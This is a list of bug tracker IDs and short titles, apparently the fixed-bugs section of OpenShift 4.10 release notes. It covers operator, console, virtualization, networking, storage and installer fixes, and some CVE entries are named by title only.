2019001 - AWS: Operator degraded (CredentialsFailing): 1 of 6 credentials requests are failing to sync.
2019096 - Update SRO leader election timeout to support SNO
2019129 - SRO in operator hub points to wrong repo for README
2019181 - Performance profile does not apply
2019198 - ptp offset metrics are not named according to the log output
2019219 - [IBMCLOUD]: cloud-provider-ibm missing IAM permissions in CCCMO CredentialRequest
2019284 - Stop action should not in the action list while VMI is not running
2019346 - zombie processes accumulation and Argument list too long
2019360 - [RFE] Virtualization Overview page
2019452 - Logger object in LSO appends to existing logger recursively
2019591 - Operator install modal body that scrolls has incorrect padding causing shadow position to be incorrect
2019634 - Pause and migration is enabled in action list for a user who has view only permission
2019636 - Actions in VM tabs should be disabled when user has view only permission
2019639 - "Take snapshot" should be disabled while VM image is still been importing
2019645 - Create button is not removed on "Virtual Machines" page for view only user
2019646 - Permission error should pop-up immediately while clicking "Create VM" button on template page for view only user
2019647 - "Remove favorite" and "Create new Template" should be disabled in template action list for view only user
2019717 - cant delete VM with un-owned pvc attached
2019722 - The shared-resource-csi-driver-node pod runs as “BestEffort” qosClass
2019739 - The shared-resource-csi-driver-node uses imagePullPolicy as "Always"
2019744 - [RFE] Suggest users to download newest RHEL 8 version
2019809 - [OVN][Upgrade] After upgrade to 4.7.34 ovnkube-master pods are in CrashLoopBackOff/ContainerCreating and other multiple issues at OVS/OVN level
2019827 - Display issue with top-level menu items running demo plugin
2019832 - 4.10 Nightlies blocked: Failed to upgrade authentication, operator was degraded
2019886 - Kuryr unable to finish ports recovery upon controller restart
2019948 - [RFE] Restructring Virtualization links
2019972 - The Nodes section doesn't display the csr of the nodes that are trying to join the cluster
2019977 - Installer doesn't validate region causing binary to hang with a 60 minute timeout
2019986 - Dynamic demo plugin fails to build
2019992 - instance:node_memory_utilisation:ratio metric is incorrect
2020001 - Update dockerfile for demo dynamic plugin to reflect dir change
2020003 - MCD does not regard "dangling" symlinks as a files, attempts to write through them on next backup, resulting in "not writing through dangling symlink" error and degradation.
2020107 - cluster-version-operator: remove runlevel from CVO namespace
2020153 - Creation of Windows high performance VM fails
2020216 - installer: Azure storage container blob where is stored bootstrap.ign file shouldn't be public
2020250 - Replacing deprecated ioutil
2020257 - Dynamic plugin with multiple webpack compilation passes may fail to build
2020275 - ClusterOperators link in console returns blank page during upgrades
2020377 - permissions error while using tcpdump option with must-gather
2020489 - coredns_dns metrics don't include the custom zone metrics data due to CoreDNS prometheus plugin is not defined
2020498 - "Show PromQL" button is disabled
2020625 - [AUTH-52] User fails to login from web console with keycloak OpenID IDP after enable group membership sync feature
2020638 - [4.7] CI conformance test failures related to CustomResourcePublishOpenAPI
2020664 - DOWN subports are not cleaned up
2020904 - When trying to create a connection from the Developer view between VMs, it fails
2021016 - 'Prometheus Stats' of dashboard 'Prometheus Overview' miss data on console compared with Grafana
2021017 - 404 page not found error on knative eventing page
2021031 - QE - Fix the topology CI scripts
2021048 - [RFE] Added MAC Spoof check
2021053 - Metallb operator presented as community operator
2021067 - Extensive number of requests from storage version operator in cluster
2021081 - Missing PolicyGenTemplate for configuring Local Storage Operator LocalVolumes
2021135 - [azure-file-csi-driver] "make unit-test" returns non-zero code, but tests pass
2021141 - Cluster should allow a fast rollout of kube-apiserver is failing on single node
2021151 - Sometimes the DU node does not get the performance profile configuration applied and MachineConfigPool stays stuck in Updating
2021152 - imagePullPolicy is "Always" for ptp operator images
2021191 - Project admins should be able to list available network attachment defintions
2021205 - Invalid URL in git import form causes validation to not happen on URL change
2021322 - cluster-api-provider-azure should populate purchase plan information
2021337 - Dynamic Plugins: ResourceLink doesn't render when passed a groupVersionKind
2021364 - Installer requires invalid AWS permission s3:GetBucketReplication
2021400 - Bump documentationBaseURL to 4.10
2021405 - [e2e][automation] VM creation wizard Cloud Init editor
2021433 - "[sig-builds][Feature:Builds][pullsearch] docker build where the registry is not specified" test fail permanently on disconnected
2021466 - [e2e][automation] Windows guest tool mount
2021544 - OCP 4.6.44 - Ingress VIP assigned as secondary IP in ovs-if-br-ex and added to resolv.conf as nameserver
2021551 - Build is not recognizing the USER group from an s2i image
2021607 - Unable to run openshift-install with a vcenter hostname that begins with a numeric character
2021629 - api request counts for current hour are incorrect
2021632 - [UI] Clicking on odf-operator breadcrumb from StorageCluster details page displays empty page
2021693 - Modals assigned modal-lg class are no longer the correct width
2021724 - Observe > Dashboards: Graph lines are not visible when obscured by other lines
2021731 - CCO occasionally down, reporting networksecurity.googleapis.com API as disabled
2021936 - Kubelet version in RPMs should be using Dockerfile label instead of git tags
2022050 - [BM][IPI] Failed during bootstrap - unable to read client-key /var/lib/kubelet/pki/kubelet-client-current.pem
2022053 - dpdk application with vhost-net is not able to start
2022114 - Console logging every proxy request
2022144 - 1 of 3 ovnkube-master pods stuck in clbo after ipi bm deployment - dualstack (Intermittent)
2022251 - wait interval in case of a failed upload due to 403 is unnecessarily long
2022399 - MON_DISK_LOW troubleshooting guide link when clicked, gives 404 error .
2022447 - ServiceAccount in manifests conflicts with OLM
2022502 - Patternfly tables with a checkbox column are not displaying correctly because of conflicting css rules.
2022509 - getOverrideForManifest does not check manifest.GVK.Group
2022536 - WebScale: duplicate ecmp next hop error caused by multiple of the same gateway IPs in ovnkube cache
2022612 - no namespace field for "Kubernetes / Compute Resources / Namespace (Pods)" admin console dashboard
2022627 - Machine object not picking up external FIP added to an openstack vm
2022646 - configure-ovs.sh failure - Error: unknown connection 'WARN:'
2022707 - Observe / monitoring dashboard shows forbidden errors on Dev Sandbox
2022801 - Add Sprint 210 translations
2022811 - Fix kubelet log rotation file handle leak
2022812 - [SCALE] ovn-kube service controller executes unnecessary load balancer operations
2022824 - Large number of sessions created by vmware-vsphere-csi-driver-operator during e2e tests
2022880 - Pipeline renders with minor visual artifact with certain task dependencies
2022886 - Incorrect URL in operator description
2023042 - CRI-O filters custom runtime allowed annotation when both custom workload and custom runtime sections specified under the config
2023060 - [e2e][automation] Windows VM with CDROM migration
2023077 - [e2e][automation] Home Overview Virtualization status
2023090 - [e2e][automation] Examples of Import URL for VM templates
2023102 - [e2e][automation] Cloudinit disk of VM from custom template
2023216 - ACL for a deleted egressfirewall still present on node join switch
2023228 - Remove Tech preview badge on Trigger components 1.6 OSP on OCP 4.9
2023238 - [sig-devex][Feature:ImageEcosystem][python][Slow] hot deploy for openshift python image Django example should work with hot deploy
2023342 - SCC admission should take ephemeralContainers into account
2023356 - Devfiles can't be loaded in Safari on macOS (403 - Forbidden)
2023434 - Update Azure Machine Spec API to accept Marketplace Images
2023500 - Latency experienced while waiting for volumes to attach to node
2023522 - can't remove package from index: database is locked
2023560 - "Network Attachment Definitions" has no project field on the top in the list view
2023592 - [e2e][automation] add mac spoof check for nad
2023604 - ACL violation when deleting a provisioning-configuration resource
2023607 - console returns blank page when normal user without any projects visit Installed Operators page
2023638 - Downgrade support level for extended control plane integration to Dev Preview
2023657 - inconsistent behaviours of adding ssh key on rhel node between 4.9 and 4.10
2023675 - Changing CNV Namespace
2023779 - Fix Patch 104847 in 4.9
2023781 - initial hardware devices is not loading in wizard
2023832 - CCO updates lastTransitionTime for non-Status changes
2023839 - Bump recommended FCOS to 34.20211031.3.0
2023865 - Console css overrides prevent dynamic plug-in PatternFly tables from displaying correctly
2023950 - make test-e2e-operator on kubernetes-nmstate results in failure to pull image from "registry:5000" repository
2023985 - [4.10] OVN idle service cannot be accessed after upgrade from 4.8
2024055 - External DNS added extra prefix for the TXT record
2024108 - Occasionally node remains in SchedulingDisabled state even after update has been completed sucessfully
2024190 - e2e-metal UPI is permafailing with inability to find rhcos.json
2024199 - 400 Bad Request error for some queries for the non admin user
2024220 - Cluster monitoring checkbox flickers when installing Operator in all-namespace mode
2024262 - Sample catalog is not displayed when one API call to the backend fails
2024309 - cluster-etcd-operator: defrag controller needs to provide proper observability
2024316 - modal about support displays wrong annotation
2024328 - [oVirt / RHV] PV disks are lost when machine deleted while node is disconnected
2024399 - Extra space is in the translated text of "Add/Remove alternate service" on Create Route page
2024448 - When ssh_authorized_keys is empty in form view it should not appear in yaml view
2024493 - Observe > Alerting > Alerting rules page throws error trying to destructure undefined
2024515 - test-blocker: Ceph-storage-plugin tests failing
2024535 - hotplug disk missing OwnerReference
2024537 - WINDOWS_IMAGE_LINK does not refer to windows cloud image
2024547 - Detail page is breaking for namespace store , backing store and bucket class.
2024551 - KMS resources not getting created for IBM FlashSystem storage
2024586 - Special Resource Operator(SRO) - Empty image in BuildConfig when using RT kernel
2024613 - pod-identity-webhook starts without tls
2024617 - vSphere CSI tests constantly failing with Rollout of the monitoring stack failed and is degraded
2024665 - Bindable services are not shown on topology
2024731 - linuxptp container: unnecessary checking of interfaces
2024750 - i18n some remaining OLM items
2024804 - gcp-pd-csi-driver does not use trusted-ca-bundle when cluster proxy configured
2024826 - [RHOS/IPI] Masters are not joining a clusters when installing on OpenStack
2024841 - test Keycloak with latest tag
2024859 - Not able to deploy an existing image from private image registry using developer console
2024880 - Egress IP breaks when network policies are applied
2024900 - Operator upgrade kube-apiserver
2024932 - console throws "Unauthorized" error after logging out
2024933 - openshift-sync plugin does not sync existing secrets/configMaps on start up
2025093 - Installer does not honour diskformat specified in storage policy and defaults to zeroedthick
2025230 - ClusterAutoscalerUnschedulablePods should not be a warning
2025266 - CreateResource route has exact prop which need to be removed
2025301 - [e2e][automation] VM actions availability in different VM states
2025304 - overwrite storage section of the DV spec instead of the pvc section
2025431 - [RFE]Provide specific windows source link
2025458 - [IPI-AWS] cluster-baremetal-operator pod in a crashloop state after patching from 4.7.21 to 4.7.36
2025464 - [aws] openshift-install gather bootstrap collects logs for bootstrap and only one master node
2025467 - [OVN-K][ETP=local] Host to service backed by ovn pods doesn't work for ExternalTrafficPolicy=local
2025481 - Update VM Snapshots UI
2025488 - [DOCS] Update the doc for nmstate operator installation
2025592 - ODC 4.9 supports invalid devfiles only
2025765 - It should not try to load from storageProfile after unchecking"Apply optimized StorageProfile settings"
2025767 - VMs orphaned during machineset scaleup
2025770 - [e2e] non-priv seems looking for v2v-vmware configMap in ns "kubevirt-hyperconverged" while using customize wizard
2025788 - [IPI on azure]Pre-check on IPI Azure, should check VM Size’s vCPUsAvailable instead of vCPUs for the sku.
2025821 - Make "Network Attachment Definitions" available to regular user
2025823 - The console nav bar ignores plugin separator in existing sections
2025830 - CentOS capitalizaion is wrong
2025837 - Warn users that the RHEL URL expire
2025884 - External CCM deploys openstack-cloud-controller-manager from quay.io/openshift/origin-
2025903 - [UI] RoleBindings tab doesn't show correct rolebindings
2026104 - [sig-imageregistry][Feature:ImageAppend] Image append should create images by appending them [Skipped:Disconnected] [Suite:openshift/conformance/parallel]
2026178 - OpenShift Alerting Rules Style-Guide Compliance
2026209 - Updation of task is getting failed (tekton hub integration)
2026223 - Internal error occurred: failed calling webhook "ptpconfigvalidationwebhook.openshift.io"
2026321 - [UPI on Azure] Shall we remove allowedValue about VMSize in ARM templates
2026343 - [upgrade from 4.5 to 4.6] .status.connectionState.address of catsrc community-operators is not correct
2026352 - Kube-Scheduler revision-pruner fail during install of new cluster
2026374 - aws-pod-identity-webhook go.mod version out of sync with build environment
2026383 - Error when rendering custom Grafana dashboard through ConfigMap
2026387 - node tuning operator metrics endpoint serving old certificates after certificate rotation
2026396 - Cachito Issues: sriov-network-operator Image build failure
2026488 - openshift-controller-manager - delete event is repeating pathologically
2026489 - ThanosRuleRuleEvaluationLatencyHigh alerts when a big quantity of alerts defined.
2026560 - Cluster-version operator does not remove unrecognized volume mounts
2026699 - fixed a bug with missing metadata
2026813 - add Mellanox CX-6 Lx DeviceID 101f NIC support in SR-IOV Operator
2026898 - Description/details are missing for Local Storage Operator
2027132 - Use the specific icon for Fedora and CentOS template
2027238 - "Node Exporter / USE Method / Cluster" CPU utilization graph shows incorrect legend
2027272 - KubeMemoryOvercommit alert should be human readable
2027281 - [Azure] External-DNS cannot find the private DNS zone in the resource group
2027288 - Devfile samples can't be loaded after fixing it on Safari (redirect caching issue)
2027299 - The status of checkbox component is not revealed correctly in code
2027311 - K8s watch hooks do not work when fetching core resources
2027342 - Alert ClusterVersionOperatorDown is firing on OpenShift Container Platform after ca certificate rotation
2027363 - The azure-file-csi-driver and azure-file-csi-driver-operator don't use the downstream images
2027387 - [IBMCLOUD] Terraform ibmcloud-provider buffers entirely the qcow2 image causing spikes of 5GB of RAM during installation
2027498 - [IBMCloud] SG Name character length limitation
2027501 - [4.10] Bootimage bump tracker
2027524 - Delete Application doesn't delete Channels or Brokers
2027563 - e2e/add-flow-ci.feature fix accessibility violations
2027585 - CVO crashes when changing spec.upstream to a cincinnati graph which includes invalid conditional edges
2027629 - Gather ValidatingWebhookConfiguration and MutatingWebhookConfiguration resource definitions
2027685 - openshift-cluster-csi-drivers pods crashing on PSI
2027745 - default samplesRegistry prevents the creation of imagestreams when registrySources.allowedRegistries is enforced
2027824 - ovnkube-master CrashLoopBackoff: panic: Expected slice or struct but got string
2027917 - No settings in hostfirmwaresettings and schema objects for masters
2027927 - sandbox creation fails due to obsolete option in /etc/containers/storage.conf
2027982 - nncp stucked at ConfigurationProgressing
2028019 - Max pending serving CSRs allowed in cluster machine approver is not right for UPI clusters
2028024 - After deleting a SpecialResource, the node is still tagged although the driver is removed
2028030 - Panic detected in cluster-image-registry-operator pod
2028042 - Desktop viewer for Windows VM shows "no Service for the RDP (Remote Desktop Protocol) can be found"
2028054 - Cloud controller manager operator can't get leader lease when upgrading from 4.8 up to 4.9
2028106 - [RFE] Use dynamic plugin actions for kubevirt plugin
2028141 - Console tests doesn't pass on Node.js 15 and 16
2028160 - Remove i18nKey in network-policy-peer-selectors.tsx
2028162 - Add Sprint 210 translations
2028170 - Remove leading and trailing whitespace
2028174 - Add Sprint 210 part 2 translations
2028187 - Console build doesn't pass on Node.js 16 because node-sass doesn't support it
2028217 - Cluster-version operator does not default Deployment replicas to one
2028240 - Multiple CatalogSources causing higher CPU use than necessary
2028268 - Password parameters are listed in FirmwareSchema in spite that cannot and shouldn't be set in HostFirmwareSettings
2028325 - disableDrain should be set automatically on SNO
2028484 - AWS EBS CSI driver's livenessprobe does not respect operator's loglevel
2028531 - Missing netFilter to the list of parameters when platform is OpenStack
2028610 - Installer doesn't retry on GCP rate limiting
2028685 - LSO repeatedly reports errors while diskmaker-discovery pod is starting
2028695 - destroy cluster does not prune bootstrap instance profile
2028731 - The containerruntimeconfig controller has wrong assumption regarding the number of containerruntimeconfigs
2028802 - CRI-O panic due to invalid memory address or nil pointer dereference
2028816 - VLAN IDs not released on failures
2028881 - Override not working for the PerformanceProfile template
2028885 - Console should show an error context if it logs an error object
2028949 - Masthead dropdown item hover text color is incorrect
2028963 - Whereabouts should reconcile stranded IP addresses
2029034 - enabling ExternalCloudProvider leads to inoperative cluster
2029178 - Create VM with wizard - page is not displayed
2029181 - Missing CR from PGT
2029273 - wizard is not able to use if project field is "All Projects"
2029369 - Cypress tests github rate limit errors
2029371 - patch pipeline--worker nodes unexpectedly reboot during scale out
2029394 - missing empty text for hardware devices at wizard review
2029414 - Alibaba Disk snapshots with XFS filesystem cannot be used
2029416 - Alibaba Disk CSI driver does not use credentials provided by CCO / ccoctl
2029521 - EFS CSI driver cannot delete volumes under load
2029570 - Azure Stack Hub: CSI Driver does not use user-ca-bundle
2029579 - Clicking on an Application which has a Helm Release in it causes an error
2029644 - New resource FirmwareSchema - reset_required exists for Dell machines and doesn't for HPE
2029645 - Sync upstream 1.15.0 downstream
2029671 - VM action "pause" and "clone" should be disabled while VM disk is still being importing
2029742 - [ovn] Stale lr-policy-list and snat rules left for egressip
2029750 - cvo keep restart due to it fail to get feature gate value during the initial start stage
2029785 - CVO panic when an edge is included in both edges and conditionaledges
2029843 - Downstream ztp-site-generate-rhel8 4.10 container image missing content(/home/ztp)
2030003 - HFS CRD: Attempt to set Integer parameter to not-numeric string value - no error
2030029 - [4.10][goroutine]Namespace stuck terminating: Failed to delete all resource types, 1 remaining: unexpected items still remain in namespace
2030228 - Fix StorageSpec resources field to use correct API
2030229 - Mirroring status card reflect wrong data
2030240 - Hide overview page for non-privileged user
2030305 - Export App job do not completes
2030347 - kube-state-metrics exposes metrics about resource annotations
2030364 - Shared resource CSI driver monitoring is not setup correctly
2030488 - Numerous Azure CI jobs are Failing with Partially Rendered machinesets
2030534 - Node selector/tolerations rules are evaluated too early
2030539 - Prometheus is not highly available
2030556 - Don't display Description or Message fields for alerting rules if those annotations are missing
2030568 - Operator installation fails to parse operatorframework.io/initialization-resource annotation
2030574 - console service uses older "service.alpha.openshift.io" for the service serving certificates.
2030677 - BOND CNI: There is no option to configure MTU on a Bond interface
2030692 - NPE in PipelineJobListener.upsertWorkflowJob
2030801 - CVE-2021-44716 golang: net/http: limit growth of header canonicalization cache
2030806 - CVE-2021-44717 golang: syscall: don't close fd 0 on ForkExec error
2030847 - PerformanceProfile API version should be v2
2030961 - Customizing the OAuth server URL does not apply to upgraded cluster
2031006 - Application name input field is not autofocused when user selects "Create application"
2031012 - Services of type loadbalancer do not work if the traffic reaches the node from an interface different from br-ex
2031040 - Error screen when open topology sidebar for a Serverless / knative service which couldn't be started
2031049 - [vsphere upi] pod machine-config-operator cannot be started due to panic issue
2031057 - Topology sidebar for Knative services shows a small pod ring with "0 undefined" as tooltip
2031060 - Failing CSR Unit test due to expired test certificate
2031085 - ovs-vswitchd running more threads than expected
2031141 - Some pods not able to reach k8s api svc IP 198.223.0.1
2031228 - CVE-2021-43813 grafana: directory traversal vulnerability
2031502 - [RFE] New common templates crash the ui
2031685 - Duplicated forward upstreams should be removed from the dns operator
2031699 - The displayed ipv6 address of a dns upstream should be case sensitive
2031797 - [RFE] Order and text of Boot source type input are wrong
2031826 - CI tests needed to confirm driver-toolkit image contents
2031831 - OCP Console - Global CSS overrides affecting dynamic plugins
2031839 - Starting from Go 1.17 invalid certificates will render a cluster dysfunctional
2031858 - GCP beta-level Role (was: CCO occasionally down, reporting networksecurity.googleapis.com API as disabled)
2031875 - [RFE]: Provide online documentation for the SRO CRD (via oc explain)
2031926 - [ipv6dualstack] After SVC conversion from single stack only to RequireDualStack, cannot curl NodePort from the node itself
2032006 - openshift-gitops-application-controller-0 failed to schedule with sufficient node allocatable resource
2032111 - arm64 cluster, create project and deploy the example deployment, pod is CrashLoopBackOff due to the image is built on linux+amd64
2032141 - open the alertrule link in new tab, got empty page
2032179 - [PROXY] external dns pod cannot reach to cloud API in the cluster behind a proxy
2032296 - Cannot create machine with ephemeral disk on Azure
2032407 - UI will show the default openshift template wizard for HANA template
2032415 - Templates page - remove "support level" badge and add "support level" column which should not be hard coded
2032421 - [RFE] UI integration with automatic updated images
2032516 - Not able to import git repo with .devfile.yaml
2032521 - openshift-installer intermittent failure on AWS with "Error: Provider produced inconsistent result after apply" when creating the aws_vpc_dhcp_options_association resource
2032547 - hardware devices table have filter when table is empty
2032565 - Deploying compressed files with a MachineConfig resource degrades the MachineConfigPool
2032566 - Cluster-ingress-router does not support Azure Stack
2032573 - Adopting enforces deploy_kernel/ramdisk which does not work with deploy_iso
2032589 - DeploymentConfigs ignore resolve-names annotation
2032732 - Fix styling conflicts due to recent console-wide CSS changes
2032831 - Knative Services and Revisions are not shown when Service has no ownerReference
2032851 - Networking is "not available" in Virtualization Overview
2032926 - Machine API components should use K8s 1.23 dependencies
2032994 - AddressPool IP is not allocated to service external IP wtih aggregationLength 24
2032998 - Can not achieve 250 pods/node with OVNKubernetes in a multiple worker node cluster
2033013 - Project dropdown in user preferences page is broken
2033044 - Unable to change import strategy if devfile is invalid
2033098 - Conjunction in ProgressiveListFooter.tsx is not translatable
2033111 - IBM VPC operator library bump removed global CLI args
2033138 - "No model registered for Templates" shows on customize wizard
2033215 - Flaky CI: crud/other-routes.spec.ts fails sometimes with an cypress ace/a11y AssertionError: 1 accessibility violation was detected
2033239 - [IPI on Alibabacloud] 'openshift-install' gets the wrong region (‘cn-hangzhou’) selected
2033257 - unable to use configmap for helm charts
2033271 - [IPI on Alibabacloud] destroying cluster succeeded, but the resource group deletion wasn’t triggered
2033290 - Product builds for console are failing
2033382 - MAPO is missing machine annotations
2033391 - csi-driver-shared-resource-operator sets unused CVO-manifest annotations
2033403 - Devfile catalog does not show provider information
2033404 - Cloud event schema is missing source type and resource field is using wrong value
2033407 - Secure route data is not pre-filled in edit flow form
2033422 - CNO not allowing LGW conversion from SGW in runtime
2033434 - Offer darwin/arm64 oc in clidownloads
2033489 - CCM operator failing on baremetal platform
2033518 - [aws-efs-csi-driver]Should not accept invalid FSType in sc for AWS EFS driver
2033524 - [IPI on Alibabacloud] interactive installer cannot list existing base domains
2033536 - [IPI on Alibabacloud] bootstrap complains invalid value for alibabaCloud.resourceGroupID when updating "cluster-infrastructure-02-config.yml" status, which leads to bootstrap failed and all master nodes NotReady
2033538 - Gather Cost Management Metrics Custom Resource
2033579 - SRO cannot update the special-resource-lifecycle ConfigMap if the data field is undefined
2033587 - Flaky CI test project-dashboard.scenario.ts: Resource Quotas Card was not found on project detail page
2033634 - list-style-type: disc is applied to the modal dropdowns
2033720 - Update samples in 4.10
2033728 - Bump OVS to 2.16.0-33
2033729 - remove runtime request timeout restriction for azure
2033745 - Cluster-version operator makes upstream update service / Cincinnati requests more frequently than intended
2033749 - Azure Stack Terraform fails without Local Provider
2033750 - Local volume should pull multi-arch image for kube-rbac-proxy
2033751 - Bump kubernetes to 1.23
2033752 - make verify fails due to missing yaml-patch
2033784 - set kube-apiserver degraded=true if webhook matches a virtual resource
2034004 - [e2e][automation] add tests for VM snapshot improvements
2034068 - [e2e][automation] Enhance tests for 4.10 downstream
2034087 - [OVN] EgressIP was assigned to the node which is not egress node anymore
2034097 - [OVN] After edit EgressIP object, the status is not correct
2034102 - [OVN] Recreate the deleted EgressIP object got InvalidEgressIP warning
2034129 - blank page returned when clicking 'Get started' button
2034144 - [OVN AWS] ovn-kube egress IP monitoring cannot detect the failure on ovn-k8s-mp0
2034153 - CNO does not verify MTU migration for OpenShiftSDN
2034155 - [OVN-K] [Multiple External Gateways] Per pod SNAT is disabled
2034170 - Use function.knative.dev for Knative Functions related labels
2034190 - unable to add new VirtIO disks to VMs
2034192 - Prometheus fails to insert reporting metrics when the sample limit is met
2034243 - regular user cant load template list
2034245 - installing a cluster on aws, gcp always fails with "Error: Incompatible provider version"
2034248 - GPU/Host device modal is too small
2034257 - regular user Create VM missing permissions alert
2034285 - [sig-api-machinery] API data in etcd should be stored at the correct location and version for all resources [Serial] [Suite:openshift/conformance/serial]
2034287 - do not block upgrades if we can't create storageclass in 4.10 in vsphere
2034300 - Du validator policy is NonCompliant after DU configuration completed
2034319 - Negation constraint is not validating packages
2034322 - CNO doesn't pick up settings required when ExternalControlPlane topology
2034350 - The CNO should implement the Whereabouts IP reconciliation cron job
2034362 - update description of disk interface
2034398 - The Whereabouts IPPools CRD should include the podref field
2034409 - Default CatalogSources should be pointing to 4.10 index images
2034410 - Metallb BGP, BFD: prometheus is not scraping the frr metrics
2034413 - cloud-network-config-controller fails to init with secret "cloud-credentials" not found in manual credential mode
2034460 - Summary: cloud-network-config-controller does not account for different environment
2034474 - Template's boot source is "Unknown source" before and after set enableCommonBootImageImport to true
2034477 - [OVN] Multiple EgressIP objects configured, EgressIPs weren't working properly
2034493 - Change cluster version operator log level
2034513 - [OVN] After update one EgressIP in EgressIP object, one internal IP lost from lr-policy-list
2034527 - IPI deployment fails 'timeout reached while inspecting the node' when provisioning network ipv6
2034528 - [IBM VPC] volumeBindingMode should be WaitForFirstConsumer
2034534 - Update ose-machine-api-provider-openstack images to be consistent with ART
2034537 - Update team
2034559 - KubeAPIErrorBudgetBurn firing outside recommended latency thresholds
2034563 - [Azure] create machine with wrong ephemeralStorageLocation value success
2034577 - Current OVN gateway mode should be reflected on node annotation as well
2034621 - context menu not popping up for application group
2034622 - Allow volume expansion by default in vsphere CSI storageclass 4.10
2034624 - Warn about unsupported CSI driver in vsphere operator
2034647 - missing volumes list in snapshot modal
2034648 - Rebase openshift-controller-manager to 1.23
2034650 - Rebase openshift/builder to 1.23
2034705 - vSphere: storage e2e tests logging configuration data
2034743 - EgressIP: assigning the same egress IP to a second EgressIP object after a ovnkube-master restart does not fail.
2034766 - Special Resource Operator(SRO) - no cert-manager pod created in dual stack environment
2034785 - ptpconfig with summary_interval cannot be applied
2034823 - RHEL9 should be starred in template list
2034838 - An external router can inject routes if no service is added
2034839 - Jenkins sync plugin does not synchronize ConfigMap having label role=jenkins-agent
2034879 - Lifecycle hook's name and owner shouldn't be allowed to be empty
2034881 - Cloud providers components should use K8s 1.23 dependencies
2034884 - ART cannot build the image because it tries to download controller-gen
2034889 - oc adm prune deployments does not work
2034898 - Regression in recently added Events feature
2034957 - update openshift-apiserver to kube 1.23.1
2035015 - ClusterLogForwarding CR remains stuck remediating forever
2035093 - openshift-cloud-network-config-controller never runs on Hypershift cluster
2035141 - [RFE] Show GPU/Host devices in template's details tab
2035146 - "kubevirt-plugin~PVC cannot be empty" shows on add-disk modal while adding existing PVC
2035167 - [cloud-network-config-controller] unable to deleted cloudprivateipconfig when deleting
2035199 - IPv6 support in mtu-migration-dispatcher.yaml
2035239 - e2e-metal-ipi-virtualmedia tests are permanently failing
2035250 - Peering with ebgp peer over multi-hops doesn't work
2035264 - [RFE] Provide a proper message for nonpriv user who not able to add PCI devices
2035315 - invalid test cases for AWS passthrough mode
2035318 - Upgrade management workflow needs to allow custom upgrade graph path for disconnected env
2035321 - Add Sprint 211 translations
2035326 - [ExternalCloudProvider] installation with additional network on workers fails
2035328 - Ccoctl does not ignore credentials request manifest marked for deletion
2035333 - Kuryr orphans ports on 504 errors from Neutron
2035348 - Fix two grammar issues in kubevirt-plugin.json strings
2035393 - oc set data --dry-run=server makes persistent changes to configmaps and secrets
2035409 - OLM E2E test depends on operator package that's no longer published
2035439 - SDN Automatic assignment EgressIP on GCP returned node IP adress not egressIP address
2035453 - [IPI on Alibabacloud] 2 worker machines stuck in Failed phase due to connection to 'ecs-cn-hangzhou.aliyuncs.com' timeout, although the specified region is 'us-east-1'
2035454 - [IPI on Alibabacloud] the OSS bucket created during installation for image registry is not deleted after destroying the cluster
2035467 - UI: Queried metrics can't be ordered on Oberve->Metrics page
2035494 - [SDN Migration]ovnkube-node pods CrashLoopBackOff after sdn migrated to ovn for RHEL workers
2035515 - [IBMCLOUD] allowVolumeExpansion should be true in storage class
2035602 - [e2e][automation] add tests for Virtualization Overview page cards
2035703 - Roles -> RoleBindings tab doesn't show RoleBindings correctly
2035704 - RoleBindings list page filter doesn't apply
2035705 - Azure 'Destroy cluster' get stuck when the cluster resource group is already not existing.
2035757 - [IPI on Alibabacloud] one master node turned NotReady which leads to installation failed
2035772 - AccessMode and VolumeMode is not reserved for customize wizard
2035847 - Two dashes in the Cronjob / Job pod name
2035859 - the output of opm render doesn't contain olm.constraint which is defined in dependencies.yaml
2035882 - [BIOS setting values] Create events for all invalid settings in spec
2035903 - One redundant capi-operator credential requests in “oc adm extract --credentials-requests”
2035910 - [UI] Manual approval options are missing after ODF 4.10 installation starts when Manual Update approval is chosen
2035927 - Cannot enable HighNodeUtilization scheduler profile
2035933 - volume mode and access mode are empty in customize wizard review tab
2035969 - "ip a " shows "Error: Peer netns reference is invalid" after create test pods
2035986 - Some pods under kube-scheduler/kube-controller-manager are using the deprecated annotation
2036006 - [BIOS setting values] Attempt to set Integer parameter results in preparation error
2036029 - New added cloud-network-config operator doesn’t supported aws sts format credential
2036096 - [azure-file-csi-driver] there are no e2e tests for NFS backend
2036113 - cluster scaling new nodes ovs-configuration fails on all new nodes
2036567 - [csi-driver-nfs] Upstream merge: Bump k8s libraries to 1.23
2036569 - [cloud-provider-openstack] Upstream merge: Bump k8s libraries to 1.23
2036577 - OCP 4.10 nightly builds from 4.10.0-0.nightly-s390x-2021-12-18-034912 to 4.10.0-0.nightly-s390x-2022-01-11-233015 fail to upgrade from OCP 4.9.11 and 4.9.12 for network type OVNKubernetes for zVM hypervisor environments
2036622 - sdn-controller crashes when restarted while a previous egress IP assignment exists
2036717 - Valid AlertmanagerConfig custom resource with valid a mute time interval definition is rejected
2036826 - oc adm prune deployments can prune the RC/RS
2036827 - The ccoctl still accepts CredentialsRequests without ServiceAccounts on GCP platform
2036861 - kube-apiserver is degraded while enable multitenant
2036937 - Command line tools page shows wrong download ODO link
2036940 - oc registry login fails if the file is empty or stdout
2036951 - [cluster-csi-snapshot-controller-operator] proxy settings is being injected in container
2036989 - Route URL copy to clipboard button wraps to a separate line by itself
2036990 - ZTP "DU Done inform policy" never becomes compliant on multi-node clusters
2036993 - Machine API components should use Go lang version 1.17
2037036 - The tuned profile goes into degraded status and ksm.service is displayed in the log.
2037061 - aws and gcp CredentialsRequest manifests missing ServiceAccountNames list for cluster-api
2037073 - Alertmanager container fails to start because of startup probe never being successful
2037075 - Builds do not support CSI volumes
2037167 - Some log level in ibm-vpc-block-csi-controller are hard code
2037168 - IBM-specific Deployment manifest for package-server-manager should be excluded on non-IBM cluster-profiles
2037182 - PingSource badge color is not matched with knativeEventing color
2037203 - "Running VMs" card is too small in Virtualization Overview
2037209 - [IPI on Alibabacloud] worker nodes are put in the default resource group unexpectedly
2037237 - Add "This is a CD-ROM boot source" to customize wizard
2037241 - default TTL for noobaa cache buckets should be 0
2037246 - Cannot customize auto-update boot source
2037276 - [IBMCLOUD] vpc-node-label-updater may fail to label nodes appropriately
2037288 - Remove stale image reference
2037331 - Ensure the ccoctl behaviors are similar between aws and gcp on the existing resources
2037483 - Rbacs for Pods within the CBO should be more restrictive
2037484 - Bump dependencies to k8s 1.23
2037554 - Mismatched wave number error message should include the wave numbers that are in conflict
2037622 - [4.10-Alibaba CSI driver][Restore size for volumesnapshot/volumesnapshotcontent is showing as 0 in Snapshot feature for Alibaba platform]
